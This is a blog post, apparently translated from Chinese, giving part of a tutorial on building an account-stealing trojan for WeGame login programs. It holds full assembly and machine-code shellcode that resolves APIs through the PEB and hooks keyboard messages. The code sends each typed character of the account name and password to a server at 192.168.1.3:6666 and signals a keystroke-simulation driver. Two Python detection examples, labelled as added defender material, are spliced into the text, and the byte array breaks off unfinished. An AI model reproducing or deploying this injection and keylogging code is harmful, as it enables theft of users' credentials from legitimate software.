Account-Stealing Trojan (3)

2021-04-02 12:01:21

Background:

In the previous post, WeGame盗号木马之旅(二) (WeGame Account-Stealing Trojan Journey, Part 2), we developed the keystroke-simulation driver; in this one we write the injected code itself.

Goal:

Write the injected code that captures the account name and the password.

Implementation:

The two figures below illustrate exactly which code this post writes:

The figure above shows the whole infection process. The injected code we write in this post is the part inside the orange box; later we will write InfectiveVirus.exe, which writes this code into the target EXE so that the EXE keeps working as normal but, at the critical moment, sends information to the server. The injected code can be thought of as code that has always been part of the target EXE. To capture the account name we first install a local (thread-specific) hook (https://msdn.microsoft.com/zh-cn/library/windows/desktop/ms644990(v=vs.85).aspx) (https://blog.csdn.net/rankun1/article/details/50973190), then set a callback that captures messages; whenever a message is captured we start a thread that creates a socket and sends the message to the server. The password side is much the same, except that the hook callback additionally checks for the WM_LBUTTONDOWN message: when the password box is clicked, we send a command to the driver from the previous post, which rapidly simulates keystrokes to produce the key-translation codebook. This is fast enough that an ordinary user does not notice. Then, when the user types the password, we start a thread and send the message exactly as for the account name.

I will assume the reader already has a basic understanding of the PE format. It is then clear that what we inject is raw binary: not the code we write in VS, and not assembly either, although assembly and machine code are equivalent and convert directly into each other. The figure below helps explain the details:

Above, we have only injected the code (machine instructions) and some parameters (strings needed by function calls, function addresses, and so on) into the target EXE, without changing the entry point. The figure below is the final version:

This way the program runs our code before its own; we then jmp to the original entry point and the program's own code executes as before O(∩_∩)O. Injecting the code and patching the entry point will be covered when we develop InfectiveVirus.exe; that is its job.

One more point: injected code is best written directly in assembly. You can also implement it in C first and then write the assembly with reference to the disassembly (friendlier for beginners -。-!!), but in the end it must be assembly, converted to machine code. The bytes are kept in a char array inside InfectiveVirus.exe, which then simply memcpy's them into the target EXE. The figure shows my finished char array of machine code:

These are just the machine-code bytes of the corresponding assembly instructions.

One more note -。-。。。。 Writing this assembly is not like ordinary assembly, where you can call a function directly, e.g. call printf("I'm the best!"). A call instruction really just sets EIP to the address of the first instruction of printf, so call printf("I'm the best!") is resolved by the compiler into something like call 0X66666666 (a made-up address). Such addresses normally come from the PE import table (https://baijiahao.baidu.com/s?id=1590821448124371294&wfr=spider&for=pc); simply put, the import table holds the entry addresses of every API the program uses. Our code is injected after the fact, so it cannot just call printf("I'm the best!") -。-///. We therefore have to obtain the addresses of the functions the injected code uses ourselves; I keep them in the injected code's data area (see one of the figures above) and then call 0X66666666 (made up) to invoke printf. Parameters such as "I'm the best" (for example) are likewise stored in the injected code's parameter area. But how do we get those function addresses? First obtain the addresses of LoadLibraryA and GetProcAddress (https://blog.csdn.net/aidem_brown/article/details/50625482); with those two we can look up any function in any module's export table (https://blog.csdn.net/evi10r/article/details/7216467). And how do we find those two? Both live in kernel32.dll, which virtually every program loads, so we can:

1. Obtain the load base address of kernel32.dll.

2. Parse the export table of kernel32.dll.

(For details see the book 《计算机病毒揭秘与对抗》 (Computer Viruses Revealed and Countered) and https://blog.csdn.net/mynote/article/details/387221?locationNum=10)

With those two functions we can then, in assembly, obtain the addresses of every other function we need.

Finally, about parameters: the arguments that function calls need must also be written into the target EXE. When calling call printf("I'm the best!"), the push "I'm the best" is really push 0X88888888 (the address of the string), so we must compute the exact address of every string. In a normal program the compiler and linker do this drudgery; we are "outsiders" and get no such help O(∩_∩)O//// The entry addresses of the instruction area and the parameter area for the two pieces of injected code are:

tgp_daemon.exe injected code, instruction area: 0x00570000

tgp_daemon.exe injected code, parameter area: 0x00571000

TASLogin.exe injected code, instruction area: 0x004F0000

TASLogin.exe injected code, parameter area: 0x004F1000

The space I reserve is 0X2000 bytes: the first 0X1000 holds instructions and the following 0X1000 holds parameters. Looking at the PE headers of the two EXEs makes this clear. PE header of tgp_daemon.exe:

ImageBase is the load base and SizeOfImage is the size of the whole PE image in memory; their sum is 0X00570000, because my data is appended to the end of the original EXE. TASLogin.exe below works the same way. PE header of TASLogin.exe:
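As an added, defender-side example (not code from this post), the Python below does statically what the two steps above and the ImageBase + SizeOfImage discussion describe, from the analyst's side: it parses a PE image's section headers and export directory (the same IMAGE_EXPORT_DIRECTORY fields at 0x18/0x1C/0x20/0x24 and the data-directory slot at OptionalHeader+0x60 that the injected stub reads), resolves an export name to its RVA, and then triages the entry point for the signs of this kind of patching: an entry point that lands in a trailing or writable+executable section, or entry code that begins by reading the PEB at fs:[30h]. The PE image is constructed in memory in mapped layout (RVA == offset), so its section names, RVAs and export names are made up for the example.

```python
import struct

# IMAGE_EXPORT_DIRECTORY fields the page's stub reads as [ebx+18h] / [ebx+1Ch] / [ebx+20h] / [ebx+24h]
EXP_NUMBER_OF_NAMES, EXP_ADDRESS_OF_FUNCTIONS = 0x18, 0x1C
EXP_ADDRESS_OF_NAMES, EXP_ADDRESS_OF_NAME_ORDINALS = 0x20, 0x24
# IMAGE_SCN_* section characteristics
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# Encodings of "mov eax, fs:[30h]" (read the PEB), the first instruction of the page's stub
PEB_READ_PATTERNS = (b"\x64\x8b\x05\x30\x00\x00\x00", b"\x64\xa1\x30\x00\x00\x00")


def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def build_sample_image():
    """Constructed PE32 in mapped layout (RVA == offset) mimicking a patched EXE: .text and
    .rdata plus an appended RWX section to which AddressOfEntryPoint has been redirected."""
    img = bytearray(0x4000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                     # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\0\0"
    # FileHeader: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 3, 0, 0, 0, 0xE0, 0x102)
    opt = nt + 24
    struct.pack_into("<H", img, opt, 0x10B)                     # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x3000)               # AddressOfEntryPoint (redirected)
    struct.pack_into("<I", img, opt + 28, 0x00400000)           # ImageBase
    struct.pack_into("<I", img, opt + 56, 0x4000)               # SizeOfImage
    struct.pack_into("<II", img, opt + 96, 0x2000, 0x100)       # DataDirectory[0] = export table
    sections = [(b".text", 0x1000, SCN_MEM_EXECUTE | SCN_MEM_READ), (b".rdata", 0x2000, SCN_MEM_READ),
                (b".inject", 0x3000, SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE)]
    for i, (name, va, flags) in enumerate(sections):            # section headers follow the optional header
        hdr = opt + 0xE0 + 40 * i
        img[hdr:hdr + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIIIIIHHI", img, hdr + 8, 0x1000, va, 0x1000, va, 0, 0, 0, 0, flags)
    # Export directory at RVA 0x2000: sorted name table; the ordinal table indexes the function table
    exp, funcs = 0x2000, [0x1100, 0x1200, 0x1300]
    names = [(b"GetProcAddress", 1), (b"LoadLibraryA", 0), (b"Sleep", 2)]
    struct.pack_into("<IIIII", img, exp + 0x14, len(funcs), len(names), exp + 0x40, exp + 0x50, exp + 0x60)
    for i, rva in enumerate(funcs):
        struct.pack_into("<I", img, exp + 0x40 + 4 * i, rva)
    str_rva = exp + 0x70
    for i, (name, ordinal) in enumerate(names):
        struct.pack_into("<I", img, exp + 0x50 + 4 * i, str_rva)
        struct.pack_into("<H", img, exp + 0x60 + 2 * i, ordinal)
        img[str_rva:str_rva + len(name) + 1] = name + b"\0"
        str_rva += len(name) + 1
    img[0x3000:0x3007] = PEB_READ_PATTERNS[0]                   # the appended stub starts with a PEB read
    return img


def sections(img):
    """Return (name, va, virtual_size, characteristics) for every section header."""
    nt = u32(img, 0x3C)
    hdr = nt + 24 + u16(img, nt + 20)
    out = []
    for i in range(u16(img, nt + 6)):
        h = hdr + 40 * i
        name = bytes(img[h:h + 8]).rstrip(b"\0").decode("ascii", "replace")
        vsize, va = struct.unpack_from("<II", img, h + 8)
        out.append((name, va, vsize, u32(img, h + 36)))
    return out


def find_export(img, wanted):
    """Walk the export name table the way the stub does and return the RVA of `wanted`, or None."""
    nt = u32(img, 0x3C)
    exp = u32(img, nt + 0x78)                    # OptionalHeader(+0x18) + DataDirectory(+0x60) + VirtualAddress
    funcs = u32(img, exp + EXP_ADDRESS_OF_FUNCTIONS)
    names = u32(img, exp + EXP_ADDRESS_OF_NAMES)
    ords = u32(img, exp + EXP_ADDRESS_OF_NAME_ORDINALS)
    for i in range(u32(img, exp + EXP_NUMBER_OF_NAMES)):
        name_rva = u32(img, names + 4 * i)
        if bytes(img[name_rva:img.index(b"\0", name_rva)]) == wanted:
            return u32(img, funcs + 4 * u16(img, ords + 2 * i))
    return None


def entry_point_findings(img):
    """Triage an image for the entry-point hijack the page describes. Returns (entry_rva, findings)."""
    nt = u32(img, 0x3C)
    ep = u32(img, nt + 24 + 16)                  # OptionalHeader.AddressOfEntryPoint
    secs, findings = sections(img), []
    for idx, (name, va, vsize, flags) in enumerate(secs):
        if va <= ep < va + vsize:
            if flags & SCN_MEM_WRITE and flags & SCN_MEM_EXECUTE:
                findings.append(f"entry point in writable+executable section {name}")
            if idx == len(secs) - 1 and idx > 0:
                findings.append(f"entry point in trailing section {name}, not the first code section")
            break
    else:
        findings.append("entry point outside every section")
    if bytes(img[ep:ep + 7]).startswith(PEB_READ_PATTERNS):
        findings.append("entry code begins with mov eax, fs:[30h] (PEB read), typical of a self-resolving stub")
    return ep, findings
```

On a real file you would map the sections first (or translate RVAs through PointerToRawData) before calling these functions; the checks themselves are the same. An entry point sitting in the last section of an otherwise ordinary EXE, combined with a PEB read as the first instruction, is exactly the shape the layout in this post produces.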

Below are the parameters we need; the comment on each line is its relative offset, in the order in which they are laid out in the parameter area.

char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\\\.\\TROJAN_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450

The PROC variables hold function addresses, the char arrays hold function names, and a few ints are scratch space. How are these parameters referenced from assembly? For example, to push pCreateFile in the tgp_daemon.exe injected code I write push 0X005713E8 (0X00571000 + 0X3E8), i.e. the parameter base address plus the relative offset.

The code below obtains the addresses of LoadLibrary and GetProcAddress, resolves the other functions we need, installs the message hook and finally returns to the original entry point. From here on I only show the TASLogin.exe injected code; the tgp_daemon.exe code is similar. The first line of the listing is the address of the first instruction, i.e. the address at which the machine code is written. -。-///

0x004F0000:

mov         eax,dword ptr fs:[00000030h]; get the PEB
mov         eax,dword ptr [eax+0Ch]; PEB+0x00C: Ldr (_PEB_LDR_DATA)
mov         eax,dword ptr [eax+0Ch]; +0x00C: first entry of InLoadOrderModuleList (_LIST_ENTRY)
mov         eax,dword ptr [eax]; +0x000: next node, InLoadOrderLinks (_LIST_ENTRY)
mov         eax,dword ptr [eax]; +0x000: next node; eax now points at the _LDR_DATA_TABLE_ENTRY of KERNEL32.DLL
mov         eax,dword ptr [eax+18h]; +0x018: DllBase, the base address of KERNEL32.DLL
mov         dword ptr [0X368+0X004F1000],eax; pKernalBaseMem
mov         eax,dword ptr [eax+3Ch]; +0x03c: e_lfanew
mov         ebx,dword ptr [0X368+0X004F1000]
add         eax,ebx; eax now points at the PE header (_IMAGE_NT_HEADERS)
add         ebx,dword ptr [eax+78h]; 0x018 OptionalHeader + 0x060 DataDirectory + 0x000 VirtualAddress: RVA of the export table, made absolute
mov         eax,dword ptr [ebx+14h]; NumberOfFunctions
mov         dword ptr [0X360+0X004F1000],eax; iNamesNum
mov         ecx,dword ptr [0X368+0X004F1000]
add         ecx,dword ptr [ebx+24h]; AddressOfNameOrdinals
mov         dword ptr [0X374+0X004F1000],ecx; pNameOrdinalsTable
mov         ecx,dword ptr [0X368+0X004F1000]
add         ecx,dword ptr [ebx+20h]; AddressOfNames
mov         dword ptr [0X378+0X004F1000],ecx; pAddressOfName
mov         ecx,dword ptr [0X368+0X004F1000]
add         ecx,dword ptr [ebx+1Ch]; AddressOfFunctions
mov         dword ptr [0X37C+0X004F1000],ecx; pAddressOfFunction
; obtain the addresses of LoadLibrary and GetProcAddress: compare each name in the name table and, on a match, fetch the address
push        esi; running out of registers, so borrow this one: pointer to the current export name string
push        edi; pointer to the target name string
mov         edx,0; index into the named exports
mov         edi,dword ptr [0X378+0X004F1000]; T1
mov         esi,dword ptr [0X368+0X004F1000]
add         esi,dword ptr [edi+edx*4]; address of the current name string
mov         edi, 0X004F1090; string "LoadLibraryA"
mov         ebx,0; LoadLibrary comparison index
mov         ecx,0; GetProcAddress comparison index
mov         ah,byte ptr [esi+ebx]; T2: fetch one byte
mov         al,byte ptr [edi+ebx]
cmp         ah,al; compare the byte
jne         0x004F00BA; jump T3
inc         ebx; next character
cmp         ebx,0Dh; end of string?
jne         0x004F0087; jump T2
mov         ecx,dword ptr [0X374+0X004F1000]
movzx       ecx,word ptr [ecx+edx*2]; index into the function address table
mov         edi,dword ptr [0X37C+0X004F1000]
mov         edi,dword ptr [edi+ecx*4]; RVA of LoadLibraryA
mov         dword ptr [0X380+0X004F1000],edi; save the result
mov         ecx,0; GetProcAddress comparison index
mov         edi, 0X004F10C0 ; T3: string "GetProcAddress"
mov         ah,byte ptr [esi+ecx]; fetch one byte
mov         al,byte ptr [edi+ecx]
cmp         ah,al; compare the byte
jne         0x004F00ED; jump T4
inc         ecx; next character
cmp         ecx,0Eh; end of string?
jne         0x004F00BA; jump T3
mov         esi,dword ptr [0X374+0X004F1000]
movzx       esi,word ptr [esi+edx*2]; index into the function address table
mov         edi,dword ptr [0X37C+0X004F1000]
mov         edi,dword ptr [edi+esi*4]; RVA of GetProcAddress
mov         dword ptr [0X384+0X004F1000],edi; save the result
mov         eax,dword ptr [0X380+0X004F1000]; T4
cmp         eax,0; have both addresses been found?
je          0x004F0105; jump T5: keep searching while either is still missing
mov         eax,dword ptr [0X384+0X004F1000]
cmp         eax,0
je          0x004F0105; jump T5
jmp         0x004F0112; jump T6: both found, leave the loop
inc         edx; T5
cmp         edx,dword ptr [0X360+0X004F1000]
jne         0x004F0066; jump T1
pop         edi; T6: restore registers
pop         esi
mov         eax,dword ptr [0X368+0X004F1000]; resolve the functions we need: first add the kernel32 base to the two RVAs
mov         ebx,dword ptr [0X380+0X004F1000]
add         ebx,eax
mov         dword ptr [0X380+0X004F1000],ebx
mov         ebx,dword ptr [0X384+0X004F1000]
add         ebx,eax
mov         dword ptr [0X384+0X004F1000],ebx
push        0X004F1030; argument: user32.dll path
call        dword ptr [0X380+0X004F1000]; LoadLibraryA
mov         dword ptr [0X36C+0X004F1000],eax; hUser32Handle
push        0X004F1060; argument: Ws2_32.dll path
call        dword ptr [0X380+0X004F1000]; LoadLibraryA
mov         dword ptr [0X370+0X004F1000],eax; hWS2_32Handle
push        0X004F10F0; argument: "GetCurrentThreadId"
push        [0X368+0X004F1000]; hModule: kernel32 base
call        [0X384+0X004F1000]; GetProcAddress
mov         [0X388+0X004F1000],eax; save
push        0X004F1120; argument: "SetWindowsHookExA"
push        [0X36C+0X004F1000]; hModule: user32
call        [0X384+0X004F1000]
mov         [0X38C+0X004F1000],eax; save
push        0X004F1150; argument: "CreateThread"
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X390+0X004F1000],eax; save
push        0X004F1180; argument: "CallNextHookEx"
push        [0X36C+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X394+0X004F1000],eax; save
push        0X004F11B0; argument: "WSAStartup"
push        [0X370+0X004F1000]; hModule: Ws2_32
call        [0X384+0X004F1000]
mov         [0X398+0X004F1000],eax; save
push        0X004F11E0; argument: "socket"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X39C+0X004F1000],eax; save
push        0X004F1210; argument: "htons"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A0+0X004F1000],eax; save
push        0X004F1270; argument: "inet_addr"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A4+0X004F1000],eax; save
push        0X004F12A0; argument: "connect"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3A8+0X004F1000],eax; save
push        0X004F12D0; argument: "send"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3AC+0X004F1000],eax; save
push        0X004F1300; argument: "closesocket"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3B0+0X004F1000],eax; save
push        0X004F1330; argument: "WSACleanup"
push        [0X370+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X3B4+0X004F1000],eax; save
push        0X004F13E8; argument: "CreateFileW"
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X448+0X004F1000],eax; save
push        0X004F1418; argument: "DeviceIoControl"
push        [0X368+0X004F1000]
call        [0X384+0X004F1000]
mov         [0X44C+0X004F1000],eax; save
call        dword ptr ds:[0X388+0X004F1000]; GetCurrentThreadId
push        eax; dwThreadId
push        0x0; hMod
push        0x004F0300; address of the hook CALLBACK
push        0x3; idHook = WH_GETMESSAGE
call        dword ptr ds:[0X38C+0X004F1000]; SetWindowsHookExA
mov         [0X364+0X004F1000],eax; save the returned HHOOK
jmp         0x00420148; jump back to the program's original entry point

Below is the hook callback in assembly. It mainly checks whether the message is WM_CHAR and, if so, starts a thread to send it; it also checks for a left-button click and, if so, starts a thread that drives the keystroke simulation to obtain the codebook (the tgp_daemon.exe injected code does not need this part):

0x004F0300:
push        ebp
mov         ebp,esp
sub         esp,0C0h
push        ebx
push        esi
push        edi
lea         edi,[ebp-0C0h]
mov         ecx,30h
mov         eax,0CCCCCCCCh
rep stos    dword ptr es:[edi]
mov         eax,dword ptr [ebp+0x10]; lParam: address of the MSG structure
mov         ebx,dword ptr [eax+4]; MSG.message
cmp         ebx,102h; WM_CHAR: is this a character message?
jne         0x004F0351; jump T1
mov         al, [eax+0x8]; MSG.wParam (the character)
mov         byte ptr [0X004F1000+0X0],al; store it in cBuffer
push        0
push        0
lea         eax,[0X004F1000+0X0]; address of cBuffer
push        eax
push        0x004F03C0; thread entry: opens a socket and sends the data
push        0
push        0
call        dword ptr [0X004F1000+0X390]; CreateThread
mov         eax,dword ptr [ebp+0x10]; address of the MSG structure
mov         ebx,dword ptr [eax+4]; MSG.message  T1
cmp         ebx,201h; WM_LBUTTONDOWN: left-button click?
jnz         0x004F0374; jump T3
push        0
push        0
push        0
push        0x004F0480; thread entry: triggers the keyboard-simulation driver
push        0
push        0
call        dword ptr [0X004F1000+0X390]; CreateThread
push        dword ptr [ebp+0x10]; T3: lParam
push        dword ptr [ebp+0xC]; wParam
push        dword ptr [ebp+0x8]; nCode
push        dword ptr [0X004F1000+0x364]; gHook
call        dword ptr [0X004F1000+0x394]; CallNextHookEx
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         0Ch

Below is the assembly that creates the socket and sends the message:

0x004F03C0:
push        ebp
mov         ebp,esp
sub         esp,40h
push        ebx
push        esi
push        edi
lea         eax,[ebp-1D0h]; lpWSAData
push        eax
push        202h; Winsock version 2.2
call        dword ptr [0X004F1000+0x398]; WSAStartup
push        0; protocol
push        1; SOCK_STREAM
push        2; AF_INET
call        dword ptr [0X004F1000+0X39C]; socket
mov         dword ptr [ebp-8],eax; keep the socket in a local
mov         eax,2
mov         word ptr [ebp-20h],ax; sockaddr_in.sin_family = AF_INET
push        1A0Ah; port
call        dword ptr [0X004F1000+0X3A0]; htons
mov         word ptr [ebp-1Eh],ax; sin_port
push        0X004F1240; the IP string
call        dword ptr [0X004F1000+0X3A4]; inet_addr
mov         dword ptr [ebp-1Ch],eax; sin_addr
push        10h; sizeof(sockaddr_in)
lea         eax,[ebp-20h]; address of the sockaddr
push        eax
mov         eax,dword ptr [ebp-8]
push        eax
call        dword ptr [0X004F1000+0X3A8]; connect
cmp         eax,0
jne         0X004F0437; jump T1 if connect failed
push        0; flags
push        1; number of bytes to send
push        dword ptr [ebp+8]; buffer address (the thread parameter)
mov         eax,dword ptr [ebp-8]
push        eax
call        dword ptr [0X004F1000+0x3AC]; send
mov         eax,dword ptr [ebp-8]; T1
push        eax
call        dword ptr [0X004F1000+0X3B0]; closesocket
call        dword ptr [0X004F1000+0X3B4]; WSACleanup
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         4
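The sender above opens a fresh TCP connection to 192.168.1.3 on port 1A0Ah (6666 decimal), sends exactly one byte for each WM_CHAR, and closes the socket, so on the wire the credential leaves as a burst of one-byte connections to a single destination. As an added, defender-side example that is not part of this post, the Python below turns that observation into a detection: tiny-payload connections are grouped by (process, destination) and a sliding window counts how many occur close together. The flow-record format and every sample row are constructed for the example, and the thresholds are assumptions to tune for your own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records in a hypothetical "timestamp process dst_ip:dst_port bytes_sent"
# format (not from the page). The TASLogin.exe rows mimic the sender above: a new connection
# and a single byte per character, then closesocket.
SAMPLE_LOG = """\
2021-04-02T12:00:00 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:00 chrome.exe 93.184.216.34:443 517
2021-04-02T12:00:01 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:01 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:02 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:02 chrome.exe 93.184.216.34:443 1
2021-04-02T12:00:03 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:04 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:05 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:00:06 TASLogin.exe 192.168.1.3:6666 1
2021-04-02T12:05:00 svchost.exe 10.0.0.5:445 1
"""


def parse_record(line):
    """Split one flow record into (timestamp, process, destination, bytes_sent)."""
    ts, proc, dst, nbytes = line.split()
    return datetime.fromisoformat(ts), proc, dst, int(nbytes)


def keystroke_exfil_candidates(log_text, min_connections=5, window=timedelta(seconds=30), max_bytes=4):
    """Flag (process, destination) pairs that open at least `min_connections` tiny-payload
    connections inside any `window`. Returns {(process, destination): peak_count}.
    The thresholds are assumptions to tune per environment."""
    by_key = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, proc, dst, nbytes = parse_record(line)
            if nbytes <= max_bytes:            # one keystroke leaves as a one-byte send
                by_key[(proc, dst)].append(ts)
    hits = {}
    for key, stamps in by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):      # sliding window over the sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_connections:
            hits[key] = peak
    return hits


if __name__ == "__main__":
    for (proc, dst), count in keystroke_exfil_candidates(SAMPLE_LOG).items():
        print(f"{proc} -> {dst}: {count} tiny connections within 30s")
```

A single large HTTPS connection or an isolated one-byte probe does not trip the rule; a game-client process that keeps reconnecting to one internal address with one byte at a time does. Feed it real connection records (Sysmon event 3, Zeek conn.log, or firewall flow logs) by adapting parse_record to the field order of that source.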

Below is the assembly that starts the driver's keystroke simulation (not needed in the tgp_daemon.exe injected code):

0x004F0480:
push        ebp
mov         ebp,esp
sub         esp,0C0h
push        ebx
push        esi
push        edi
push        0; hTemplateFile
push        80h; FILE_ATTRIBUTE_NORMAL
push        3; OPEN_EXISTING
push        0; lpSecurityAttributes
push        3; FILE_SHARE_READ | FILE_SHARE_WRITE
push        0xC0000000; GENERIC_READ | GENERIC_WRITE
push        0X004F13B8; the driver's symbolic link name
call        [0X004F1000+0X448]; CreateFileW: open the driver
push        0; lpOverlapped
push        0x004F1450; lpBytesReturned (temp in the parameter area)
push        0; nOutBufferSize
push        0; lpOutBuffer
push        0; nInBufferSize
push        0; lpInBuffer
push        0; dwIoControlCode
push        eax; the device handle
call        [0X004F1000+0X44C]; DeviceIoControl: send the command that starts the driver
pop         edi
pop         esi
pop         ebx
mov         esp,ebp
pop         ebp
ret         4

Writing the assembly is not the end of it; it still has to be turned into machine code, as follows:

// injected code (TASLogin.exe)
char shellcode2[] = {
 0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
 0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
 0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
 0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
 0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
 0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
 0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
 0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
 0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
 0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
 0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
 0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
 0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
 0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
 0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
 0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
 0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
 0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
 0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
 0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
 0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
 0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
 0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
 0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
 0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
 0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
 0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
 0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
